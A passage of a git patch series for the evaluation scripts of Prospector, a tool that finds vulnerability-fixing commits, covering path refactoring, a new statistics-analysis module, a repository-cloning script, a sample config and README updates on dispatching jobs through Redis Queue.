argparse.ArgumentParser(description="Prospector scripts") @@ -105,13 +99,13 @@ def main(argv): if args.execute and not args.analyze: dispatch_prospector_jobs(args.input, args.cve) - # analysis of Prospector report + # analysis of Prospector reports elif ( args.analyze and not args.rules and not args.execute and not args.stats ): - # analyze_prospector(args.input) analyse_prospector_reports(args.input) + # analysis of execution statistics in report elif args.analyze and args.stats and not args.rules and not args.execute: analyse_statistics(args.input) @@ -119,11 +113,7 @@ def main(argv): elif args.empty_queue and not args.execute and not args.stats: empty_queue() - # analysis of rules - elif args.analyze and args.rules and not args.execute: - analyze_results_rules(args.input) - - # Count how many report there are or there are missing + # Count how many reports there are or there are missing elif not args.analyze and not args.execute and args.count: count_existing_reports(args.input) From 6ca51024717936ef9e9eed4d6af2b59d2d624cd0 Mon Sep 17 00:00:00 2001 From: I748376 Date: Fri, 2 Aug 2024 13:57:24 +0000 Subject: [PATCH 076/130] changes back to one reports path from config --- prospector/evaluation/utils.py | 10 +++------- 1 file changed, 3 insertions(+), 7 deletions(-) diff --git a/prospector/evaluation/utils.py b/prospector/evaluation/utils.py index ef832c8a5..e5fcaf816 100644 --- a/prospector/evaluation/utils.py +++ b/prospector/evaluation/utils.py @@ -14,11 +14,7 @@ INPUT_DATA_PATH = config.input_data_path # Select the folder depending whether LLMs are used or not -PROSPECTOR_REPORT_PATH = ( - config.prospector_reports_llm_path - if config.prospector_settings.llm_service.use_llm_repository_url - else config.prospector_reports_no_llm_path -) +PROSPECTOR_REPORT_PATH = config.prospector_reports_path ANALYSIS_RESULTS_PATH = config.analysis_results_path VULN = ["version", "through", "versions"] @@ -118,7 +114,7 @@ def check_advisory(cve, repository=None, nlp=None): def update_summary_execution_table( - mode: str, data, data_total: str, filepath: str + mode: str, data, total: str, filepath: str ) -> None: """Updates the latex table at {ANALYSIS_RESULTS_PATH}/`file_path`. For this to work, the table latex code from D6.3 for tracer_dataset_results table must be saved in the file. @@ -164,7 +160,7 @@ def update_summary_execution_table( # Add the last row showing the total count last_row_data = table_lines[23].split("&") - last_row_data[col_indices[0]] = f"\\textbf{data_total}" + last_row_data[col_indices[0]] = f"\\textbf{total}" table_lines[23] = " & ".join(last_row_data) # Write the updated table back to the file From 2d9ea2cae34e79c941a732aee46435d0b4d8a23a Mon Sep 17 00:00:00 2001 From: I748376 Date: Fri, 2 Aug 2024 13:58:21 +0000 Subject: [PATCH 077/130] moves cloning repositories to fill gitcache into evaluation folder --- prospector/evaluation/cloning_repos.py | 30 ++++++++++++++++++++++++++ 1 file changed, 30 insertions(+) create mode 100644 prospector/evaluation/cloning_repos.py diff --git a/prospector/evaluation/cloning_repos.py b/prospector/evaluation/cloning_repos.py new file mode 100644 index 000000000..99581741a --- /dev/null +++ b/prospector/evaluation/cloning_repos.py @@ -0,0 +1,30 @@ +from evaluation.utils import load_dataset +from git.git import clone_repo_multiple + + +# Get the URLs from d63.csv -> set +urls = set() +dataset = load_dataset( + "/home/i748376/prospector/project-kb/prospector/evaluation/data/input/d63.csv" +) + +for cve_record in dataset: + urls.add(cve_record[1]) + +urls = list(urls) +urls = [ + "https://github.com/hueniverse/undefsafe", +] + +print(f"Retrieved {len(urls)} distinct repositories from the dataset.") + +# Call clone_repo_multiple() on this set +results = clone_repo_multiple( + urls, + output_folder="/home/i748376/data/gitcache", + skip_existing=False, + shallow=False, + concurrent=1, +) + +print("Cloning completed. Results: ", results) From 8c8b01d819390bffd7f4e200fe9384721977b23f Mon Sep 17 00:00:00 2001 From: I748376 Date: Fri, 2 Aug 2024 15:15:16 +0000 Subject: [PATCH 078/130] creates new script to analyse statistics --- prospector/evaluation/analyse.py | 139 +------------------ prospector/evaluation/analyse_statistics.py | 145 ++++++++++++++++++++ prospector/evaluation/dispatch_jobs.py | 10 +- prospector/evaluation/main.py | 2 +- 4 files changed, 150 insertions(+), 146 deletions(-) create mode 100644 prospector/evaluation/analyse_statistics.py diff --git a/prospector/evaluation/analyse.py b/prospector/evaluation/analyse.py index 7a7667330..1924faed4 100644 --- a/prospector/evaluation/analyse.py +++ b/prospector/evaluation/analyse.py @@ -1,7 +1,6 @@ -from datetime import datetime import json import os -from typing import Dict, List, Tuple +from typing import List from tqdm import tqdm @@ -270,142 +269,6 @@ def _list_intersection(list1, list2): return list(set(list1) & set(list2)) -def analyse_statistics(filename: str): # noqa: C901 - """Analyses the Statistics field in each Prospector report of the CVEs contained in `filename`. - - Args: - filename (str): The input CSV file containing CVE information with the following columns: - # ID;URL;VERSIONS;FLAG;COMMITS;COMMENTS - This file must be present in the INPUT_DATA_PATH folder. - - Prints: - The average time taken for getting the repository URL, for applying the commit classification - one single time and for applying the commit classification for all X commits. - """ - file = INPUT_DATA_PATH + filename + ".csv" - dataset = load_dataset(file) - - missing, files_with_no_commits = [], [] - skipped = 0 - - repo_times, cc_times, total_cc_times = [], [], [] - - # For each CSV in the input dataset, check its report - for itm in dataset: - # Each itm has ID;URL;VERSIONS;FLAG;COMMITS;COMMENTS - filepath = PROSPECTOR_REPORT_PATH + filename + f"/{itm[0]}.json" - try: - repo_time, avg_cc_time, total_cc_time = process_llm_statistics( - filepath - ) - - repo_times.append(repo_time) - cc_times.append(avg_cc_time) - total_cc_times.append(total_cc_time) - - except FileNotFoundError: - # print(f"Skipped {itm[0]}.json because file could not be found.") # Sanity Check - missing.append(itm[0]) - skipped += 1 - - except ValueError: - print(f"Skipped {itm[0]}.json.") - files_with_no_commits.append(itm[0]) - skipped += 1 - - finally: - continue - - avg_repo_time = sum(repo_times) / len(repo_times) - avg_cc_time = sum(cc_times) / len(cc_times) - avg_total_cc_time = sum(total_cc_times) / len(total_cc_times) - - # How many commits was the commit classification rule applied to? - for itm in dataset: - filepath = PROSPECTOR_REPORT_PATH + filename + f"/{itm[0]}.json" - try: - cc_num_commits = get_cc_num_commits(filepath) - break - - except FileNotFoundError: - continue - - execution_data = { - "timestamp": datetime.now().strftime("%H:%M:%S"), - "total_files_found": len(repo_times), - "missing_reports": len(missing), - "skipped_reports": skipped, - "timings": { - "avg_time_repo_url": avg_repo_time, - "avg_time_commit_classification_single": avg_cc_time, - "avg_time_commit_classification_all": avg_total_cc_time, - }, - } - - # Load existing data or create new structure - try: - with open(ANALYSIS_RESULTS_PATH + "llm_stats.json", "r") as f: - data = json.load(f) - except FileNotFoundError: - data = {"executions": []} - - # Add the new execution data - data["executions"].append(execution_data) - - # Save the updated data - with open(ANALYSIS_RESULTS_PATH + "llm_stats.json", "w") as f: - json.dump(data, f, indent=2) - - -def process_llm_statistics(filepath: str) -> Tuple[float, float, float]: - """Extracts the LLM statistics saved in Prospector's JSON report. - - Params: - filepath (str): The filepath to the Prospector report in JSON format. - - Returns: - Tuple[float, float, float]: (time for getting repository URL, avg. - time for one commit classification, sum of all commit classification times) - """ - with open(filepath, "r") as file: - data = json.load(file) - - try: - llm_stats = data["processing_statistics"]["LLM"] - - total_cc_time = sum( - llm_stats["commit_classification"]["execution time"] - ) - - avg_cc_time = total_cc_time / len( - llm_stats["commit_classification"]["execution time"] - ) - - return ( - llm_stats["repository_url"]["execution time"][0], - avg_cc_time, - total_cc_time, - ) - - except Exception as e: - print(f"Did not have expected JSON fields: {filepath}: {e}") - raise ValueError - - -def get_cc_num_commits(filepath): - """Returns how many commits the commit classification rule was applied to.""" - with open(filepath, "r") as file: - data = json.load(file) - - num = len( - data["processing_statistics"]["LLM"]["commit_classification"][ - "execution time" - ] - ) - - return num - - def count_existing_reports(data_filepath): """Prints which CVEs reports are missing for to the console.""" file = INPUT_DATA_PATH + data_filepath + ".csv" diff --git a/prospector/evaluation/analyse_statistics.py b/prospector/evaluation/analyse_statistics.py new file mode 100644 index 000000000..ff05d6ebd --- /dev/null +++ b/prospector/evaluation/analyse_statistics.py @@ -0,0 +1,145 @@ +from datetime import datetime +import json +from typing import Tuple +from evaluation.utils import ( + ANALYSIS_RESULTS_PATH, + INPUT_DATA_PATH, + PROSPECTOR_REPORT_PATH, + load_dataset, +) + + +def analyse_statistics(filename: str): # noqa: C901 + """Analyses the Statistics field in each Prospector report of the CVEs contained in `filename`. + + Args: + filename (str): The input CSV file containing CVE information with the following columns: + # ID;URL;VERSIONS;FLAG;COMMITS;COMMENTS + This file must be present in the INPUT_DATA_PATH folder. + + Prints: + The average time taken for getting the repository URL, for applying the commit classification + one single time and for applying the commit classification for all X commits. + """ + file = INPUT_DATA_PATH + filename + ".csv" + dataset = load_dataset(file) + + missing, files_with_no_commits = [], [] + skipped = 0 + + repo_times, cc_times, total_cc_times = [], [], [] + + # For each CSV in the input dataset, check its report + for itm in dataset: + # Each itm has ID;URL;VERSIONS;FLAG;COMMITS;COMMENTS + filepath = PROSPECTOR_REPORT_PATH + filename + f"/{itm[0]}.json" + try: + repo_time, avg_cc_time, total_cc_time = process_llm_statistics( + filepath + ) + + repo_times.append(repo_time) + cc_times.append(avg_cc_time) + total_cc_times.append(total_cc_time) + + except FileNotFoundError: + # print(f"Skipped {itm[0]}.json because file could not be found.") # Sanity Check + missing.append(itm[0]) + skipped += 1 + + except ValueError: + print(f"Skipped {itm[0]}.json.") + files_with_no_commits.append(itm[0]) + skipped += 1 + + finally: + continue + + avg_repo_time = sum(repo_times) / len(repo_times) + avg_cc_time = sum(cc_times) / len(cc_times) + avg_total_cc_time = sum(total_cc_times) / len(total_cc_times) + + # How many commits was the commit classification rule applied to? + for itm in dataset: + filepath = PROSPECTOR_REPORT_PATH + filename + f"/{itm[0]}.json" + try: + cc_num_commits = get_cc_num_commits(filepath) + break + + except FileNotFoundError: + continue + + execution_data = { + "timestamp": datetime.now().strftime("%H:%M:%S"), + "total_files_found": len(repo_times), + "missing_reports": len(missing), + "skipped_reports": skipped, + "timings": { + "avg_time_repo_url": avg_repo_time, + "avg_time_commit_classification_single": avg_cc_time, + "avg_time_commit_classification_all": avg_total_cc_time, + }, + } + + # Load existing data or create new structure + try: + with open(ANALYSIS_RESULTS_PATH + "llm_stats.json", "r") as f: + data = json.load(f) + except FileNotFoundError: + data = {"executions": []} + + # Add the new execution data + data["executions"].append(execution_data) + + # Save the updated data + with open(ANALYSIS_RESULTS_PATH + "llm_stats.json", "w") as f: + json.dump(data, f, indent=2) + + +def process_llm_statistics(filepath: str) -> Tuple[float, float, float]: + """Extracts the LLM statistics saved in Prospector's JSON report. + + Params: + filepath (str): The filepath to the Prospector report in JSON format. + + Returns: + Tuple[float, float, float]: (time for getting repository URL, avg. + time for one commit classification, sum of all commit classification times) + """ + with open(filepath, "r") as file: + data = json.load(file) + + try: + llm_stats = data["processing_statistics"]["LLM"] + + total_cc_time = sum( + llm_stats["commit_classification"]["execution time"] + ) + + avg_cc_time = total_cc_time / len( + llm_stats["commit_classification"]["execution time"] + ) + + return ( + llm_stats["repository_url"]["execution time"][0], + avg_cc_time, + total_cc_time, + ) + + except Exception as e: + print(f"Did not have expected JSON fields: {filepath}: {e}") + raise ValueError + + +def get_cc_num_commits(filepath): + """Returns how many commits the commit classification rule was applied to.""" + with open(filepath, "r") as file: + data = json.load(file) + + num = len( + data["processing_statistics"]["LLM"]["commit_classification"][ + "execution time" + ] + ) + + return num diff --git a/prospector/evaluation/dispatch_jobs.py b/prospector/evaluation/dispatch_jobs.py index 1cc167358..465ff5639 100644 --- a/prospector/evaluation/dispatch_jobs.py +++ b/prospector/evaluation/dispatch_jobs.py @@ -28,7 +28,7 @@ def dispatch_prospector_jobs(filename: str, selected_cves: str): """Dispatches jobs to the queue.""" dataset = load_dataset(INPUT_DATA_PATH + filename + ".csv") - dataset = dataset[:100] + # dataset = dataset[100:200] # Only run a subset of CVEs if the user supplied a selected set if len(selected_cves) != 0: @@ -55,12 +55,8 @@ def dispatch_prospector_jobs(filename: str, selected_cves: str): "cve_id": cve[0], "version_interval": cve[2], "report_type": "json", - "output_file": f"{PROSPECTOR_REPORT_PATH}/{cve[0]}.json", - "repository_url": ( - cve[1] - if not prospector_config.llm_service.use_llm_repository_url - else None - ), + "output_file": f"{PROSPECTOR_REPORT_PATH}{cve[0]}.json", + "repository_url": cve[1], }, description="Prospector Job", id=cve[0], diff --git a/prospector/evaluation/main.py b/prospector/evaluation/main.py index 57e8d758c..0f28eaea7 100644 --- a/prospector/evaluation/main.py +++ b/prospector/evaluation/main.py @@ -6,9 +6,9 @@ from evaluation.analyse import ( analyse_prospector_reports, - analyse_statistics, count_existing_reports, ) +from evaluation.analyse_statistics import analyse_statistics from evaluation.dispatch_jobs import ( dispatch_prospector_jobs, empty_queue, From 1e579e780140205393c8a748ec2f22adb1595509 Mon Sep 17 00:00:00 2001 From: I748376 Date: Mon, 5 Aug 2024 08:32:43 +0000 Subject: [PATCH 079/130] prints error to console instead of crashing at None, -1 returned from Prospector --- prospector/core/prospector.py | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/prospector/core/prospector.py b/prospector/core/prospector.py index 108de1655..20b269e41 100644 --- a/prospector/core/prospector.py +++ b/prospector/core/prospector.py @@ -121,7 +121,7 @@ def prospector( # noqa: C901 repository = Git(repository_url, cache_path=git_cache) with ConsoleWriter("Git repository cloning") as console: - repository.clone(skip_existing=True) + repository.clone() tags = repository.get_tags() From 34522336269491fbcd9ab17066d40a13e71dc7d2 Mon Sep 17 00:00:00 2001 From: I748376 Date: Mon, 5 Aug 2024 08:38:48 +0000 Subject: [PATCH 080/130] starts function to create boxplot with statistics --- prospector/evaluation/analyse.py | 2 +- prospector/evaluation/analyse_statistics.py | 42 +++++++++++++++++++-- 2 files changed, 39 insertions(+), 5 deletions(-) diff --git a/prospector/evaluation/analyse.py b/prospector/evaluation/analyse.py index 1924faed4..429e02539 100644 --- a/prospector/evaluation/analyse.py +++ b/prospector/evaluation/analyse.py @@ -287,5 +287,5 @@ def count_existing_reports(data_filepath): missing_reports.append(cve_id) print( - f"There is no report for {len(missing_reports)} CVEs: {missing_reports}" + f"There are {len(dataset) - len(missing_reports)} reports. Reports are missing for {len(missing_reports)} CVEs: {missing_reports}" ) diff --git a/prospector/evaluation/analyse_statistics.py b/prospector/evaluation/analyse_statistics.py index ff05d6ebd..473e1685f 100644 --- a/prospector/evaluation/analyse_statistics.py +++ b/prospector/evaluation/analyse_statistics.py @@ -1,5 +1,8 @@ from datetime import datetime import json +import pandas as pd +import matplotlib.pyplot as plt +import seaborn as sns from typing import Tuple from evaluation.utils import ( ANALYSIS_RESULTS_PATH, @@ -34,7 +37,7 @@ def analyse_statistics(filename: str): # noqa: C901 # Each itm has ID;URL;VERSIONS;FLAG;COMMITS;COMMENTS filepath = PROSPECTOR_REPORT_PATH + filename + f"/{itm[0]}.json" try: - repo_time, avg_cc_time, total_cc_time = process_llm_statistics( + repo_time, avg_cc_time, total_cc_time = _process_llm_statistics( filepath ) @@ -63,7 +66,7 @@ def analyse_statistics(filename: str): # noqa: C901 for itm in dataset: filepath = PROSPECTOR_REPORT_PATH + filename + f"/{itm[0]}.json" try: - cc_num_commits = get_cc_num_commits(filepath) + cc_num_commits = _get_cc_num_commits(filepath) break except FileNotFoundError: @@ -96,7 +99,7 @@ def analyse_statistics(filename: str): # noqa: C901 json.dump(data, f, indent=2) -def process_llm_statistics(filepath: str) -> Tuple[float, float, float]: +def _process_llm_statistics(filepath: str) -> Tuple[float, float, float]: """Extracts the LLM statistics saved in Prospector's JSON report. Params: @@ -131,7 +134,7 @@ def process_llm_statistics(filepath: str) -> Tuple[float, float, float]: raise ValueError -def get_cc_num_commits(filepath): +def _get_cc_num_commits(filepath): """Returns how many commits the commit classification rule was applied to.""" with open(filepath, "r") as file: data = json.load(file) @@ -143,3 +146,34 @@ def get_cc_num_commits(filepath): ) return num + + +# def overall_execution_time(): +# """Create a boxplot to compare the overall execution time across four +# categories of reports.""" +# data = [] + +# file = f"{INPUT_DATA_PATH}d63.csv" +# dataset = load_dataset(file) + +# for record in dataset: +# try: +# with open(f"{PROSPECTOR_REPORT_PATH}{record[0]}", "r") as file: +# report = json.load(file) +# core_execution_time = report["processing_statistics"]["core"][ +# "execution time" +# ][0] +# data.append( +# {"set": "hello", "core_execution_time": core_execution_time} +# ) +# except FileNotFoundError: +# continue + +# df = pd.DataFrame(data) + +# sns.boxplot(x="set", y="core_execution_time", data=df) +# plt.title("Overall Execution Time Comparison") +# plt.xlabel("Report Set") +# plt.ylabel("Execution Time (s)") + +# plt.show() From 41f7c98e8aef2bca96346b7b0829c957e94d1a11 Mon Sep 17 00:00:00 2001 From: I748376 Date: Mon, 5 Aug 2024 08:44:12 +0000 Subject: [PATCH 081/130] configuration file for evaluation code --- prospector/evaluation/config-sample.yaml | 61 ++++++++++++++++ prospector/evaluation/config.yaml | 90 ------------------------ 2 files changed, 61 insertions(+), 90 deletions(-) create mode 100644 prospector/evaluation/config-sample.yaml delete mode 100644 prospector/evaluation/config.yaml diff --git a/prospector/evaluation/config-sample.yaml b/prospector/evaluation/config-sample.yaml new file mode 100644 index 000000000..b9e8c0afa --- /dev/null +++ b/prospector/evaluation/config-sample.yaml @@ -0,0 +1,61 @@ +# Debug Level +debug_level: INFO + +# Input Data +input_data_path: evaluation/data/input/ # datasets to run prospector on (CSV: ID;URL;VERSIONS;FLAG;COMMITS;COMMENTS) + +# Prospector Reports +prospector_reports_path: evaluation/data/reports_without_llm/ + +# Analysis Results +analysis_results_path: evaluation/data/results/ + +# Report Comparison directories +compare_directory1: evaluation/data/matteo_reports/d63/ +compare_directory2: evaluation/data/reports_without_llm_mvi/d63_correct_us/ + +# Prospector settings (from Prospector config.yaml) +prospector_settings: + use_backend: always + + backend: http://backend:8000 + + database: + user: postgres + password: example + host: db + port: 5432 + dbname: postgres + + redis_url: redis://localhost:6379/0 + + # LLM Usage + llm_service: + type: sap + model_name: gpt-4 + temperature: 0.0 + ai_core_sk: sk.json + + # LLM support options + use_llm_repository_url: True + + enabled_rules: + # Phase 1 Rules + - VULN_ID_IN_MESSAGE + - XREF_BUG + - XREF_GH + - COMMIT_IN_REFERENCE + - VULN_ID_IN_LINKED_ISSUE + - CHANGES_RELEVANT_FILES + - CHANGES_RELEVANT_CODE + - RELEVANT_WORDS_IN_MESSAGE + - ADV_KEYWORDS_IN_FILES + - ADV_KEYWORDS_IN_MSG + - SEC_KEYWORDS_IN_MESSAGE + - SEC_KEYWORDS_IN_LINKED_GH + - SEC_KEYWORDS_IN_LINKED_BUG + - GITHUB_ISSUE_IN_MESSAGE + - BUG_IN_MESSAGE + - COMMIT_HAS_TWINS + # Phase 2 Rules (llm_service required!): + # - COMMIT_IS_SECURITY_RELEVANT diff --git a/prospector/evaluation/config.yaml b/prospector/evaluation/config.yaml deleted file mode 100644 index 4c0625a19..000000000 --- a/prospector/evaluation/config.yaml +++ /dev/null @@ -1,90 +0,0 @@ -# Debug Level -debug_level: DEBUG - -# Input Data -input_data_path: evaluation/data/input/ # datasets to run prospector on (CSV: ID;URL;VERSIONS;FLAG;COMMITS;COMMENTS) - -# Prospector Reports -prospector_reports_llm_path: evaluation/data/reports_with_llm_mvi/ # reports generated by Prospector, sorted by names of input datasets -# prospector_reports_llm_path: evaluation/data/reports_with_llm/ # reports generated by Prospector, sorted by names of input datasets -prospector_reports_no_llm_path: evaluation/data/reports_without_llm_mvi/ -# reports generated by Prospector, sorted by names of input datasets: -# evaluation/data/matteo_reports/ -# evaluation/data/reports_without_llm/ - -# Analysis Results -analysis_results_path: evaluation/data/results/ - -# Report Comparison directories -compare_directory1: evaluation/data/matteo_reports/d63/ -compare_directory2: evaluation/data/reports_without_llm_mvi/d63_correct_us/ - -# Prospector settings (1:1 from the Prospector config.yaml) -prospector_settings: - # Whether to preprocess only the repository's commits or fully run prospector - preprocess_only: False - - # Maximum number of commits to process - max_candidates: 2000 - - fetch_references: False - - # Whether to use the NVD database or not - use_nvd: True - - # Whether to use a backend or not: "always", "never", "optional" - use_backend: always - - backend: http://backend:8000 - - database: - user: postgres - password: example - host: db # Database address; when in containerised version, use 'db', otherwise 'localhost' - port: 5432 - dbname: postgres - - redis_url: redis://localhost:6379/0 - # LASCHA: change to same format as database - - # LLM Usage (check README for help) - llm_service: - type: sap # sap or third_party - model_name: gpt-4 # gpt-4 or mistral-large-latest - temperature: 0.0 # optional, default is 0.0 - ai_core_sk: sk.json - - # LLM support options (check README for help) - use_llm_repository_url: True - - enabled_rules: - # Phase 1 Rules - - VULN_ID_IN_MESSAGE - - XREF_BUG - - XREF_GH - - COMMIT_IN_REFERENCE - - VULN_ID_IN_LINKED_ISSUE - - CHANGES_RELEVANT_FILES - - CHANGES_RELEVANT_CODE - - RELEVANT_WORDS_IN_MESSAGE - - ADV_KEYWORDS_IN_FILES - - ADV_KEYWORDS_IN_MSG - - SEC_KEYWORDS_IN_MESSAGE - - SEC_KEYWORDS_IN_LINKED_GH - - SEC_KEYWORDS_IN_LINKED_BUG - - GITHUB_ISSUE_IN_MESSAGE - - BUG_IN_MESSAGE - - COMMIT_HAS_TWINS - # Phase 2 Rules (llm_service required!): - - COMMIT_IS_SECURITY_RELEVANT - - # Report file format: "html", "json", "console" or "all" - # and the file name - report: - format: all - name: prospector-report - no_diff: False - - git_cache: /tmp/gitcache # When running Prospector containerised - - github_token: \ No newline at end of file From fd99b6f83cd09d8f47eb4ac2608c066c38e374b5 Mon Sep 17 00:00:00 2001 From: I748376 Date: Mon, 5 Aug 2024 08:50:21 +0000 Subject: [PATCH 082/130] adds gitignore for evaluation folder --- prospector/evaluation/.gitignore | 4 ++++ 1 file changed, 4 insertions(+) create mode 100644 prospector/evaluation/.gitignore diff --git a/prospector/evaluation/.gitignore b/prospector/evaluation/.gitignore new file mode 100644 index 000000000..af49c1aa6 --- /dev/null +++ b/prospector/evaluation/.gitignore @@ -0,0 +1,4 @@ +data/ +ancient.py +config.yaml +temp.py \ No newline at end of file From 2dea986a3a3765f3d334a0de3ced362dc6b2c0a1 Mon Sep 17 00:00:00 2001 From: I748376 Date: Mon, 5 Aug 2024 08:50:59 +0000 Subject: [PATCH 083/130] adds script to extract lines with error reasons from log --- prospector/evaluation/extract_errors.py | 26 +++++++++++++++++++++++++ 1 file changed, 26 insertions(+) create mode 100644 prospector/evaluation/extract_errors.py diff --git a/prospector/evaluation/extract_errors.py b/prospector/evaluation/extract_errors.py new file mode 100644 index 000000000..269875208 --- /dev/null +++ b/prospector/evaluation/extract_errors.py @@ -0,0 +1,26 @@ +import re + +from evaluation.utils import ( + INPUT_DATA_PATH, + PROSPECTOR_REPORT_PATH, + load_dataset, +) + + +def extract_crash_lines(log_file_path, output_file_path): + crash_pattern = re.compile(r".*prospector\(\) crashed at.*") + + with open(log_file_path, "r") as log_file, open( + output_file_path, "a" + ) as output_file: + for line in log_file: + if crash_pattern.match(line): + output_file.write(line) + + +# Usage +log_file_path = f"{PROSPECTOR_REPORT_PATH}prospector.log" +output_file_path = f"{PROSPECTOR_REPORT_PATH}error_lines.log" + +extract_crash_lines(log_file_path, output_file_path) +print(f"Error lines have been extracted to {output_file_path}") From fee7a4aa5c2bc7c701e15657ca35fa5d4cbe32bd Mon Sep 17 00:00:00 2001 From: I748376 Date: Mon, 5 Aug 2024 09:34:27 +0000 Subject: [PATCH 084/130] updates readme and removes unused cl flags from main --- prospector/evaluation/README.md | 69 ++++++++++++++------------------- prospector/evaluation/main.py | 14 ------- 2 files changed, 29 insertions(+), 54 deletions(-) diff --git a/prospector/evaluation/README.md b/prospector/evaluation/README.md index 40a5c5d3b..934efce1d 100644 --- a/prospector/evaluation/README.md +++ b/prospector/evaluation/README.md @@ -1,58 +1,47 @@ # Evaluate Prospector -This folder contains code to run the evaluation of Prospector using Redis Queue. This means that the `prospector()` function will be packaged as a job and executed by the `prospector_worker` container. +This folder contains the scripts used for evaluating Prospector's reports (created and used in Summer 2024). The folder is structured as follows: -To see what's going on, visualise the output of the worker container with: +1. **Data** folder: contains input data, Prospector reports and results of the analysis of the Prospector reports. +2. **Scripts**: The scripts used for running Prospector on a batch of CVEs, and for analysing the created reports. -```bash -docker attach prospector_worker_1 -``` +Prospector is run in the following way in this evaluation: + +First, the five docker containers must be started with `make docker-setup` or manually with `docker` commands. Once they are running, `docker ps` should show the following: -To interact with the worker container (or any other container), run: ```bash -docker exec -it prospector_worker_1 bash +CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES +c73aed108475 prospector_backend "python ./service/ma…" 47 minutes ago Up 47 minutes 0.0.0.0:8000->8000/tcp, :::8000->8000/tcp prospector_backend_1 +2e9da86b09a8 prospector_worker "/usr/local/bin/star…" 47 minutes ago Up 47 minutes prospector_worker_1 +b219fd6219ed adminer "entrypoint.sh php -…" 47 minutes ago Up 47 minutes 0.0.0.0:8080->8080/tcp, :::8080->8080/tcp prospector_adminer_1 +9aacdc04f7c5 postgres "docker-entrypoint.s…" 47 minutes ago Up 47 minutes 0.0.0.0:5432->5432/tcp, :::5432->5432/tcp db +7c540450ab76 redis:alpine "docker-entrypoint.s…" 47 minutes ago Up 47 minutes 0.0.0.0:6379->6379/tcp, :::6379->6379/tcp prospector_redis_1 ``` +[`dispatch_jobs.py`](#running-prospector-on-multiple-cves-dispatch_jobspy) creates jobs with the `prospector()` function in them and enqueues them in a Redis Queue, from which the `prospector_worker` container fetches jobs and executes them. To visualise what is going on, run `docker attach prospector_worker_1` to see the usual console output. In order to change something inside the container, run `docker exec -it prospector_worker_1 bash` to open an interactive bash shell. -## Settings - -Just like when running Prospector, there is also a configuration file for the evaluation code in this folder: `evaluation/config.yaml`. It contains the same fields as `config.yaml`, bundled in the `prospector_settings` field, so you can set everything as usual in one central place. -All other settings (outside of the `prospector_settings`) are for setting up evaluation specific parameters. - -## Enqueuing Jobs - +## Command Line Options +All scripts are called from `main.py`, depending on the CL flags that are set. The following flags can be set: -### Which CVEs should Prospector be run on? +1. `-i`: Sets the filename of the file in the input data path. +2. `-c`: Allows you to select a subset of CVEs, instead of all CVEs from the input data (eg. `-c CVE-2020-1925, CVE-2018-1234`) +3. `-e`: For *execute*, dispatched jobs for all CVEs from the input data (or the subset if `-c` is set) to the Redis Queue (`dispatch_jobs.py`). +4. `-a`: Analyses the reports created by Propsector (`analysis.py`) +5. `-s`: Analyses the statistics part of the Prospector reports (eg. to analyse execution times, `analyse_statistics.py`) +6. `-eq`: For *empty queue*, to empty the jobs left on the queue. +7. `-co`: For *count*, to count how many of the CVEs in the input data have a corresponding report. -The evaluation code expects data input in the form of CSV files with the following columns: `(CSV: ID;URL;VERSIONS;FLAG;COMMITS;COMMENTS)`. +## Configuration File -First, if you have your input data saved somewhere else than `/evaluation/data/input/`, please change the `input_data_path` accordingly. -Give your dataset a descriptive name, such as `steady-dataset.csv`. You can specify -which dataset you would want to use when running the CL command for evaluation [(List of Command Line Options)](#command-line-options). - - -## Run Evaluation - -### Dispatch Prospector Jobs -To dispatch several Prospector jobs to the queue, use: - -```bash -python3 evaluation/run_multiple -i -e -``` +The configuration file has two parts to it: a main part and a Prospector settings part, which is a copy of a part of the original Prospector `config.yaml` file. -### List of Command Line Options +The main part at the top allows you to set the path to where the input data can be found, where Prospector reports should be saved to and where analysis results should be saved to. -* `-i` or `--input`: Specify the input file (likely a CSV with vulnerability data) -* `-e` or `--execute`: Run Prospector on the input data -* `-a` or `--analyze`: Analyze the results of previous Prospector runs -* `-o` or `--output`: Specify an output file (for certain operations) -* `-r` or `--rules`: Perform rules analysis -* `-f` or `--folder`: Specify a folder to analyze -* `-c` or `--cve`: Specify a particular CVE to analyze -* `-p` or `--parallel`: Run in parallel on multiple CVEs +The Prospector part allows you to set the settings for Prospector (independent from the Prospector settings used when running Prospector with `./run_prospector`). **Watch out**: Since the `prospector_worker` container is created in the beginning with the current state of the `config.yaml`, simply saving any changes in `config.yaml` and dispatching new jobs will still run them with the old configuration. For new configuration parameters to take effect, destroy the containers with `make docker-clean` and rebuild them with `make docker-setup`. +## Script Files explained -## Exisiting Datasets +### Running Prospector on multiple CVEs (`dispatch_jobs.py`) -1. `d63`: Dataset of CVEs and their fixing commits used in D6.3 of AssureMOSS. Formerly called `tracer_dataset_correct_full_unsupervised.csv`. \ No newline at end of file +The code for running Prospector is in `dispatch_jobs.py`. It exctracts CVE IDs from the data given in the path constructed as: `input_data_path` + the `-i` CL parameter. It then dispatches a job for each CVE ID to the queue, from where these jobs get executed. \ No newline at end of file diff --git a/prospector/evaluation/main.py b/prospector/evaluation/main.py index 0f28eaea7..fe8366ee6 100644 --- a/prospector/evaluation/main.py +++ b/prospector/evaluation/main.py @@ -39,20 +39,6 @@ def parse_cli_args(args): help="Input file", ) - parser.add_argument( - "-o", - "--output", - type=str, - help="Output file", - ) - - parser.add_argument( - "-r", - "--rules", - action="store_true", - help="Rules analysis option", - ) - parser.add_argument( "-s", "--stats", From 3ad62e8e4d9b17dca47affbeff69a2ac58b58c97 Mon Sep 17 00:00:00 2001 From: I748376 Date: Mon, 5 Aug 2024 12:38:28 +0000 Subject: [PATCH 085/130] creates boxplot of overall execution time for all 4 categories --- prospector/evaluation/analyse_statistics.py | 70 ++++++++++++--------- prospector/evaluation/main.py | 14 +++-- 2 files changed, 49 insertions(+), 35 deletions(-) diff --git a/prospector/evaluation/analyse_statistics.py b/prospector/evaluation/analyse_statistics.py index 473e1685f..27ce0baa2 100644 --- a/prospector/evaluation/analyse_statistics.py +++ b/prospector/evaluation/analyse_statistics.py @@ -148,32 +148,44 @@ def _get_cc_num_commits(filepath): return num -# def overall_execution_time(): -# """Create a boxplot to compare the overall execution time across four -# categories of reports.""" -# data = [] - -# file = f"{INPUT_DATA_PATH}d63.csv" -# dataset = load_dataset(file) - -# for record in dataset: -# try: -# with open(f"{PROSPECTOR_REPORT_PATH}{record[0]}", "r") as file: -# report = json.load(file) -# core_execution_time = report["processing_statistics"]["core"][ -# "execution time" -# ][0] -# data.append( -# {"set": "hello", "core_execution_time": core_execution_time} -# ) -# 